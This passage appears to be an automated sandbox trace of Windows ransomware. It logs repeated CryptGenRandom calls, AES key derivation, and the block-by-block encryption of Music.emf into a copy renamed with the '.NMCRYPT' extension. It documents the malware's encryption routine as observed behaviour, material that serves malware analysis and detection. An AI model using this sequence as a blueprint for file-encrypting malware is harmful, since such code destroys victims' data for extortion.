out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.116] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.117] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.117] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.117] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.117] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.117] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.117] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0164.117] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.117] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad4f8) returned 1 [0164.117] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0164.117] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0164.117] wcslen (_String="\\\\?\\") returned 0x4 [0164.118] CryptDuplicateKey (in: hKey=0x9ad4f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad4b8) returned 1 [0164.118] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0164.118] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0164.118] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=26036) returned 1 [0164.118] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0164.119] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.120] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.120] GetLastError () returned 0x0 [0164.120] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.122] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.122] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.122] GetLastError () returned 0x0 [0164.122] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.122] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.122] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.122] GetLastError () returned 0x0 [0164.122] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.122] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.123] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.123] GetLastError () returned 0x0 [0164.123] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.123] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.123] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.123] GetLastError () returned 0x0 [0164.123] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.123] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.123] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.123] GetLastError () returned 0x0 [0164.123] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.123] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.123] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.123] GetLastError () returned 0x0 [0164.123] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.123] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.123] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.123] GetLastError () returned 0x0 [0164.123] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.123] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.123] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.123] GetLastError () returned 0x0 [0164.123] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.123] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.123] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.123] GetLastError () returned 0x0 [0164.123] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.124] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.124] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.124] GetLastError () returned 0x0 [0164.124] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.124] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.124] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: 